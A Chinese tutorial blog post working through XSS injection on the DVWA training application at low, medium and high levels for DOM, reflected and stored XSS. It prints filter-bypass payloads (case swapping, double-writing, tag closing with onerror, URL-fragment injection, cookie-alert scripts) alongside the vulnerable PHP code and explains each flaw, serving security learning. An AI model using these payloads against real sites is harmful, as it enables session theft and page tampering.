网络安全-靶机dvwa之XSS注入Low到High详解（含代码分析）

逃离我推掉我的手 2022-12-15 11:30 6阅读 0赞

**目录**

XSS(DOM)-LOW

普通注入

代码分析

后端

前端

XSS(DOM)-MIDIUM

普通注入

大小写绕过

Html标签绕过

闭合标签

代码分析

XSS(DOM)-HIGH

闭合+HTML标签绕过

代码分析

主要步骤

漏洞原因

XSS(Reflected)-LOW

普通注入

代码分析

主要步骤

漏洞原因

XSS(Reflected)-MIDIUM

普通注入

大小写绕过

双写绕过

代码分析

主要步骤

漏洞原因

XSS(Reflected)-HIGH

普通注入

大小写绕过

双写绕过

html标签绕过

代码分析

主要步骤

漏洞原因

XSS(Stored)-LOW

普通注入

代码分析

主要步骤

漏洞原因

XSS(Stored)-MIDIUM

普通注入

大小写绕过

代码分析

主要步骤

漏洞原因

XSS(Stored)-HIGH

Html标签绕过

代码分析

主要步骤

漏洞原因

--------------------

本篇文章，针对靶机dvwa（Damn Vulnerable Web Application）中的XSS(DOM)、XSS(Reflected)、XSS(Stored)的LOW、MIDIUM、HIGH安全级别使用[网络安全-js安全知识点与XSS常用payloads][-js_XSS_payloads]中提到的XSS注入payloads，使用手工进行XSS注入。并根据[网络安全-php安全知识点][-php]对LOW、MIDIUM、HIGH、IMPOSSIBLE安全级别的代码进行解释。

目标：弹出窗口/获得cookie

# XSS(DOM)-LOW #

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70][] 正常

可以看到，是get型

## 普通注入 ##

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 1][] 注入成功

## 代码分析 ##

### 后端 ###

<?php
    
    # No protections, anything goes
    
    ?>

### 前端 ###

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 2][] F12

代码：

if (document.location.href.indexOf("default=") >= 0) {
        var lang = document.location.href.substring(document.location.href.indexOf("default=") + 8);
        document.write("<option value='" + lang + "'>" + decodeURI(lang) + "</option>");
        document.write("<option value='' disabled='disabled'>----</option>");
    }
    
    document.write("<option value='English'>English</option>");
    document.write("<option value='French'>French</option>");
    document.write("<option value='Spanish'>Spanish</option>");
    document.write("<option value='German'>German</option>");

下拉框显示4个，上面显示default参数的内容

漏洞原因：

输入未过滤

输出未改变编码

# XSS(DOM)-MIDIUM #

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 3][] 正常

可以看到是Get型

## 普通注入 ##

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 4][] 过了一会没有问题

过了一会，然后显示English。尝试大小写绕过。

## 大小写绕过 ##

<scRipt>alert('lady_killer9')</sCript>

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 5][] 正常

和上面一样，过了一会显示English。尝试Html标签绕过。

## Html标签绕过 ##

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 6][] 仍没有显示

还是没有显示，那应该是需要闭合标签了

## 闭合标签 ##

></option></select><img src=x:alert(alt) onerror=eval(src) alt=xss>

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 7][] 注入成功

![20201016190753616.PNG][] 代码插进去了

在这之前我们已经按了F12，查看了源代码，其实除了存储型，DOM和反射都没什么意思，因为可以F12直接查看，对其他用户也没什么攻击性。

## 代码分析 ##

<?php
    
    // Is there any input?
    if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
        $default = $_GET['default'];
        
        # Do not allow script tags
        if (stripos ($default, "<script") !== false) {
            header ("location: ?default=English");
            exit;
        }
    }
    
    ?>

后端过滤了一下<script，大小写都不行。

# XSS(DOM)-HIGH #

HIGH级别就不从普通的开始试了

## 闭合+HTML标签绕过 ##

></option></select><img src=x:alert(alt) onerror=eval(src) alt=xss>

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 8][] 失败了

还是会变成English，应该是后端的问题。我也不知道怎么干了。。。

\----------------写完后面的反射型，我又回来了---------------

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 9][] 锚点

反射型XSS注入url的**锚点（\#）后并没有标签id**，这似乎提醒着我们可以在锚点后注入（《CTF特训营 P28页也提到了锚点》），这样就不会传到服务器了。

English#<script>alert('xss')</script>

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 10][] 注入成功

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 11][] 点击确定后

##  代码分析 ##

<?php
    
    // Is there any input?
    if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
    
        # White list the allowable languages
        switch ($_GET['default']) {
            case "French":
            case "English":
            case "German":
            case "Spanish":
                # ok
                break;
            default:
                header ("location: ?default=English");
                exit;
        }
    }
    
    ?>

### 主要步骤 ###

*  array\_key\_exists函数判断default变量是否存在，并判断是否非空
 *  使用switch...case构造白名单，若不在case中跳回到English

### 漏洞原因 ###

*  输入想使用switch..case来解决，确实很棒，但是由于不是存储型，可以不发送到服务器进行数据库的存储。不过，锚点这个挺难想到的，还好后面有提示，挺巧妙的！！！
 *  输出未改变编码

# XSS(Reflected)-LOW #

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 12][] 正常

## 普通注入 ##

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 13][] 异常

## 代码分析 ##

<?php
    
    header ("X-XSS-Protection: 0");
    
    // Is there any input?
    if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
        // Feedback for end user
        echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
    }
    
    ?>

### 主要步骤 ###

*  array\_key\_exists函数判断name变量是否存在，并判断是否非空
 *  若存在且非空，直接输出

### 漏洞原因 ###

*  输入未过滤
 *  输出未改变编码

# XSS(Reflected)-MIDIUM #

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 14][] 正常

## 普通注入 ##

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 15][] 注入失败

从结果来看，<script>和</script>没有了，可能被删除或替换为空字符串。尝试大小写绕过和双写绕过

## 大小写绕过 ##

<sCript>alert(document.cookie)</scRipt>

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 16][] 注入成功

## 双写绕过 ##

<scr<script>ipt>alert('XSS')</scr<script>ipt>

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 17][] 注入成功

## 代码分析 ##

<?php
    
    header ("X-XSS-Protection: 0");
    
    // Is there any input?
    if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
        // Get input
        $name = str_replace( '<script>', '', $_GET[ 'name' ] );
    
        // Feedback for end user
        echo "<pre>Hello ${name}</pre>";
    }
    
    ?>

### 主要步骤 ###

*  array\_key\_exists函数判断name变量是否存在，并判断是否非空
 *  若存在且非空，使用str\_replace函数替换<script>为空字符串，然后输出

### 漏洞原因 ###

*  输入过滤不到位，尝试使用str\_replace函数进行过滤，此函数**区分大小写，对替换后的字符串不会再检查**，可被双写、大小写等绕过
 *  输出未改变编码

# XSS(Reflected)-HIGH #

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 18][] 正常

## 普通注入 ##

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 19][] 注入失败

仅剩余了>，其他全部没有了，尝试大小写或双写绕过

## 大小写绕过 ##

<sCript>aleRt(document.cookie)</scRipt>

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 20][] 注入失败

## 双写绕过 ##

<scr<script>ipt>aleralertt(document.cookie)</scr<script>ipt>

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 21][] 注入失败

可能使用了正则表达式，尝试不使用js标签

## html标签绕过 ##

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 22][] 注入成功

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 23][] 注入成功

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 24][] 点击链接后跳转

## 代码分析 ##

<?php
    
    header ("X-XSS-Protection: 0");
    
    // Is there any input?
    if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
        // Get input
        $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );
    
        // Feedback for end user
        echo "<pre>Hello ${name}</pre>";
    }
    
    ?>

### 主要步骤 ###

*  array\_key\_exists函数判断name变量是否存在，并判断是否非空
 *  若存在且非空，使用preg\_replace函数进行正则表达式匹配，且大小写都会匹配到，替换为空字符串，然后输出

### 漏洞原因 ###

*  输入过滤不到位，尝试使用preg\_replace函数进行正则表达式匹配过滤，但仅匹配了<script>相关，未匹配html标签
 *  输出未改变编码

# XSS(Stored)-LOW #

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 25][] 正常

post方式，两个都会输出，对一个进行注入即可。

## 普通注入 ##

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 26][] 失败

Name有长度限制，Message注入失败，应该是Name可以注入，但是被限制了。尝试抓包进行注入。

txtName=<script>alert('lady_killer9')</script>&mtxMessage=%3Cscript%3Ealert%28%27lady_killer9%27%29%3C%2Fscript%3E&btnSign=Sign+Guestbook

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 27][] 注入成功

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 28][] 点击其他页面并返回

## 代码分析 ##

<?php
    
    if( isset( $_POST[ 'btnSign' ] ) ) {
        // Get input
        $message = trim( $_POST[ 'mtxMessage' ] );
        $name    = trim( $_POST[ 'txtName' ] );
    
        // Sanitize message input
        $message = stripslashes( $message );
        $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    
        // Sanitize name input
        $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    
        // Update database
        $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
    
        //mysql_close();
    }
    
    ?>

## 主要步骤 ##

*  isset函数判断btnSign是否提交，即是否点击了Sign Guessbook按钮。
 *  使用trim函数去除提交的mtxMesssage、txtName前后导空格，分别给message、name变量
 *  使用stripslashes函数对message删除反斜杠，使用mysqli\_real\_escape\_string函数对name、message变量中的特殊字符转义
 *  使用mysqli\_query函数插入数据库

## 漏洞原因 ##

*  未过滤输入，使用post方式增加难度
 *  输出未改变编码

通过阅读后端代码，我们发现name长度的判断并不在后端，按F12查看前端代码。

![20201016163548810.PNG][] 发现maxlength

删除maxlength="10"

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 29][] 注入成功

漏洞原因：使用前端限制长度

# XSS(Stored)-MIDIUM #

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 30][] 使用前端进行的长度限制

通过LOW级别，我们知道是前端限制的Name，我们接下来不再抓包，直接删除maxlength，就在页面进行XSS注入。

## 普通注入 ##

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 31][] 标签被删除

标签没了，尝试大小写绕过

## 大小写绕过 ##

<scRipt>alert('lady_killer9')</sCript>

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 32][] 注入

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 33][] 成功

## 代码分析 ##

<?php
    
    if( isset( $_POST[ 'btnSign' ] ) ) {
        // Get input
        $message = trim( $_POST[ 'mtxMessage' ] );
        $name    = trim( $_POST[ 'txtName' ] );
    
        // Sanitize message input
        $message = strip_tags( addslashes( $message ) );
        $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $message = htmlspecialchars( $message );
    
        // Sanitize name input
        $name = str_replace( '<script>', '', $name );
        $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    
        // Update database
        $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
    
        //mysql_close();
    }
    
    ?>

### 主要步骤 ###

*  isset函数判断btnSign是否提交，即是否点击了Sign Guessbook按钮。
 *  使用trim函数去除提交的mtxMesssage、txtName前后导空格，分别给message、name变量
 *  使用strip\_tags函数对 使用函数addslashes添加反斜杠的message变量 剥去heml、xml、php标签，使用mysqli\_real\_escape\_string函数对message变量中的特殊字符转义
 *  使用**str\_replace函数将name中的<script>标签替换为空字符串**，使用mysqli\_real\_escape\_string函数对name变量中的特殊字符转义
 *  使用mysqli\_query函数插入数据库

### 漏洞原因 ###

# XSS(Stored)-HIGH #

还是post方式，前端检查长度，直接删除，然后Html标签绕过、

## Html标签绕过 ##

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 34][] 注入

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 35][] 成功

## 代码分析 ##

<?php
    
    if( isset( $_POST[ 'btnSign' ] ) ) {
        // Get input
        $message = trim( $_POST[ 'mtxMessage' ] );
        $name    = trim( $_POST[ 'txtName' ] );
    
        // Sanitize message input
        $message = strip_tags( addslashes( $message ) );
        $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $message = htmlspecialchars( $message );
    
        // Sanitize name input
        $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );
        $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    
        // Update database
        $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
    
        //mysql_close();
    }
    
    ?>

### 主要步骤 ###

*  isset函数判断btnSign是否提交，即是否点击了Sign Guessbook按钮。
 *  使用trim函数去除提交的mtxMesssage、txtName前后导空格，分别给message、name变量
 *  使用strip\_tags函数对 使用函数addslashes添加反斜杠的message变量 剥去heml、xml、php标签，使用mysqli\_real\_escape\_string函数对message变量中的特殊字符转义
 *  使用**preg\_replace函数**进行正则表达式匹配，然后替换为空字符串，使用mysqli\_real\_escape\_string函数对name变量中的特殊字符转义
 *  使用mysqli\_query函数插入数据库

### 漏洞原因 ###

*  输入过滤不到位，尝试使用preg\_replace函数进行正则表达式匹配过滤，但仅匹配了<script>相关，未匹配html标签
 *  输出未改变编码

更多内容查看：[网络安全-自学笔记][-]

喜欢本文的请动动小手点个赞，收藏一下，有问题请下方评论，转载请注明出处，并附有原文链接，谢谢！如有侵权，请及时联系。如果您感觉有所收获，自愿打赏，可选择支付宝18833895206（小于），您的支持是我不断更新的动力。

[-js_XSS_payloads]: https://blog.csdn.net/lady_killer9/article/details/109058941
[-php]: https://blog.csdn.net/lady_killer9/article/details/108978062
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70]: /images/20221123/244f41c47fec46ee8609d10c98576a59.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 1]: /images/20221123/8370d245c51c46e4bfaa9a2b94a3a076.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 2]: /images/20221123/f955266c2ebb4c7fb184f14f2489ff37.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 3]: /images/20221123/57999b667b8c4dc09ead35bf94e3c012.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 4]: /images/20221123/b2a7d331a79444349d9ca3edaed6e8cf.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 5]: /images/20221123/8b1c8530b4bc44a3b893d9abee568465.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 6]: /images/20221123/3d2c9f3cd5244291b7a0008eadfcb6ee.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 7]: /images/20221123/7497a2aa5d584c458bed9697c7725fd9.png
[20201016190753616.PNG]: /images/20221123/c721b6db2bc54911a1cf0bfa8202968a.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 8]: /images/20221123/250c19410ffe4e2fb6f5f9b3a9b55e8b.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 9]: /images/20221123/d4efdf5c990f45f38134cebc71fe4593.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 10]: /images/20221123/d332088a5db3415e93f1b1e1489ee6dc.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 11]: /images/20221123/a8eb4e10c417485f8b0180d71f1da8f7.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 12]: /images/20221123/4bb32b4b8d894e989e34711ad3a65311.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 13]: /images/20221123/43b4491cfe014a2f8fe2d8041ce5d414.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 14]: /images/20221123/0a3c9ed85db54ed4a416528d82eda0d5.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 15]: /images/20221123/203a12b7e69c48e48136991310cbd64f.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 16]: /images/20221123/d8dbeea3fec941419a1547d6a0cf4edd.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 17]: /images/20221123/f08127bef32e46d38d875ccd7ea84a6a.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 18]: /images/20221123/d093e664c74b45039240913f7c9268c3.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 19]: /images/20221123/1dda7f2b5761441e8bf7dfae4cf53f82.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 20]: /images/20221123/75cb23081efa4159b1d763fbf3224352.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 21]: /images/20221123/e93238f41d5b4d46bb1d1d5a2371d5d9.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 22]: /images/20221123/0665a09be3b84c12bc0e062ea0bf8fd3.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 23]: /images/20221123/491e99a474a74833948ef7d28f47e6bf.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 24]: /images/20221123/ea06bddd61444f9ea953f2e45e441731.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 25]: /images/20221123/8eca080d4ee34715b495a17d4ec00c8a.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 26]: /images/20221123/6cd240a53cc24826807115c5a3af0177.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 27]: /images/20221123/6aadd61216304cffbd2a1d62b196b10d.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 28]: /images/20221123/ef89a9409b5645a09135ec2d73a70435.png
[20201016163548810.PNG]: /images/20221123/e95981cf82ea4734844870b8c46cc259.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 29]: /images/20221123/945780ec9d2b404da23a72392bea0dfe.png
